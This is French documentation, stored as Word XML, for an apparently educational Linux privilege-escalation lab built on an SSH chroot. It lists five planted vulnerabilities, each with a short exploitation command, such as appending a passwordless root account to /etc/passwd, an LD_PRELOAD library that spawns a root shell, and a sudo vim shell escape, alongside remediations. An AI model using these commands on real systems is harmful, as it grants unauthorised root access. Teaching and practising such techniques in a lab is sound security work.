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JAIL v2.3 — Laboratoire de Privilege Escalation Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Environnement chroot SSH vulnerable pour l'apprentissage des techniques de privilege escalation sous Linux.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Objectif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ce lab permet de pratiquer differentes techniques d'elevation de privileges dans un environnement isole et controle :</w:t>
        <w:br/>
        <w:t>• SUID Bit Exploitation</w:t>
        <w:br/>
        <w:t>• Writable /etc/passwd</w:t>
        <w:br/>
        <w:t>• Cron Job Hijacking</w:t>
        <w:br/>
        <w:t>• LD_PRELOAD Injection</w:t>
        <w:br/>
        <w:t>• Sudo + Vim Escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Le script setup_jail.sh cree un chroot dans /home/jailed avec :</w:t>
        <w:br/>
        <w:t>• Binaires : bash, ls, cat, mkdir, rm, touch, python3, vim, env, find, grep, chmod, id, whoami, su, gcc</w:t>
        <w:br/>
        <w:t>• Bibliotheques dynamiques copiees avec arborescence complete</w:t>
        <w:br/>
        <w:t>• /etc/passwd, /etc/group, /etc/shadow (resolution UID/nom)</w:t>
        <w:br/>
        <w:t>• PAM (pam_permit.so) pour su et sudo</w:t>
        <w:br/>
        <w:t>• NSS (nsswitch.conf + libnss_files) pour la resolution des noms</w:t>
        <w:br/>
        <w:t>• Devices : /dev/null, /dev/tty, /dev/urandom</w:t>
        <w:br/>
        <w:t>• Configuration SSH : Match User jailed → ChrootDirectory /home/jailed</w:t>
        <w:br/>
        <w:br/>
        <w:t>L'isolation repose sur le ChrootDirectory SSH (pas sur un shell restreint).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prerequis : Debian 11/12 avec acces root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t>su -</w:t>
        <w:br/>
        <w:t>apt update &amp;&amp; apt upgrade -y</w:t>
        <w:br/>
        <w:t>apt install git dos2unix -y</w:t>
        <w:br/>
        <w:t>cd /opt</w:t>
        <w:br/>
        <w:t>git clone https://github.com/Slurptheworld/Jail.git</w:t>
        <w:br/>
        <w:t>cd Jail</w:t>
        <w:br/>
        <w:t>dos2unix *.sh</w:t>
        <w:br/>
        <w:t>chmod +x *.sh</w:t>
        <w:br/>
        <w:t>./setup_jail.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Note : setup_jail.sh installe automatiquement vim, python3 et gcc si absents, cree les fichiers utilisateurs (passwd, group, shadow), configure PAM et NSS, et met en place le chroot SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Identifiants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Utilisateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>Acces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>jailed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>password123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>SSH → Chroot</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br/>
        <w:t>Connexion : ssh jailed@&lt;IP_DEBIAN&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Vulnerabilites disponibles</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 SUID Bash/Python3 (vuln_suid.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Difficulte : Facile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Le bit SUID sur bash ou python3 permet d'ouvrir un shell root.</w:t>
        <w:br/>
        <w:t>Detection : find / -perm -4000 -type f 2&gt;/dev/null</w:t>
        <w:br/>
        <w:t>Exploitation : /bin/bash -p</w:t>
        <w:br/>
        <w:t>Remediation : Ne jamais appliquer SUID sur des shells interactifs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 /etc/passwd writable (vuln_passwd.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Difficulte : Facile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Si /etc/passwd est modifiable (chmod 666), on peut ajouter un compte root.</w:t>
        <w:br/>
        <w:t>Exploitation :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  echo 'hacker::0:0:hacker:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
        <w:br/>
        <w:t xml:space="preserve">  su hacker</w:t>
        <w:br/>
        <w:t>Remediation : chmod 644 /etc/passwd (root seul peut ecrire).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 Cron Job Hijacking (vuln_cron.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Difficulte : Moyenne</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Un cron root execute un script modifiable par tous.</w:t>
        <w:br/>
        <w:t>Exploitation : Remplacer le script par un payload (cp /bin/bash /tmp/rootbash &amp;&amp; chmod 4755).</w:t>
        <w:br/>
        <w:t>Attendre 1 minute, puis /tmp/rootbash -p.</w:t>
        <w:br/>
        <w:t>Remediation : Fichiers cron en 600/644, scripts immutables (chattr +i).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.4 LD_PRELOAD Injection (vuln_ldpreload.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Difficulte : Avancee</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Le binaire env est SUID root. On peut injecter une bibliotheque .so via LD_PRELOAD.</w:t>
        <w:br/>
        <w:t>Exploitation :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  1. Ecrire exploit.c avec _init() { setuid(0); system("/bin/bash"); }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  2. gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles</w:t>
        <w:br/>
        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls</w:t>
        <w:br/>
        <w:t>Remediation : Ne pas mettre SUID sur env. Restreindre gcc en production.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.5 Sudo + Vim Escape (vuln_sudo_vim.sh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Difficulte : Facile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>sudo autorise jailed a executer vim en root sans mot de passe.</w:t>
        <w:br/>
        <w:t>Ce script installe sudo, la regle sudoers et monte /proc.</w:t>
        <w:br/>
        <w:t>(PAM, NSS et shadow sont deja presents via setup_jail.sh)</w:t>
        <w:br/>
        <w:t>Exploitation :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sudo -l  → reperer (ALL) NOPASSWD: /bin/vim</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sudo vim -c ':!/bin/bash'  → shell root</w:t>
        <w:br/>
        <w:t>Remediation : Ne jamais donner sudo sur des editeurs. Utiliser sudoedit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Activation des vulnerabilites</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r>
        <w:t># En root sur le serveur Debian</w:t>
        <w:br/>
        <w:t>sudo ./vuln_suid.sh       # Active SUID</w:t>
        <w:br/>
        <w:t>sudo ./vuln_passwd.sh     # Active passwd writable</w:t>
        <w:br/>
        <w:t>sudo ./vuln_cron.sh       # Active cron vulnerable</w:t>
        <w:br/>
        <w:t>sudo ./vuln_ldpreload.sh  # Active LD_PRELOAD</w:t>
        <w:br/>
        <w:t>sudo ./vuln_sudo_vim.sh   # Active Sudo + Vim (installe sudo + sudoers + /proc)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Nettoyage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Pour remettre la Debian a zero :</w:t>
        <w:br/>
        <w:br/>
        <w:t>sudo ./cleanup_jail.sh</w:t>
        <w:br/>
        <w:br/>
        <w:t>Ce script supprime :</w:t>
        <w:br/>
        <w:t>• /proc monte dans le chroot (demontage)</w:t>
        <w:br/>
        <w:t>• L'utilisateur jailed</w:t>
        <w:br/>
        <w:t>• Les regles sudo vulnerables</w:t>
        <w:br/>
        <w:t>• Le repertoire /home/jailed</w:t>
        <w:br/>
        <w:t>• Le bloc Match User dans sshd_config + restart SSH</w:t>
        <w:br/>
        <w:t>• Les taches cron malveillantes</w:t>
        <w:br/>
        <w:t>• Les binaires SUID suspects</w:t>
        <w:br/>
        <w:t>• Les entrees frauduleuses dans /etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Ressources</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>• Interface web interactive : jail-lab.html</w:t>
        <w:br/>
        <w:t>• GTFOBins : https://gtfobins.github.io/</w:t>
        <w:br/>
        <w:t>• HackTricks Linux PrivEsc : https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
        <w:br/>
        <w:br/>
        <w:t>AVERTISSEMENT : Ce laboratoire est destine uniquement a des fins educatives dans un environnement controle. L'utilisation de ces techniques sur des systemes sans autorisation est illegale.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Auteur : Slurptheworld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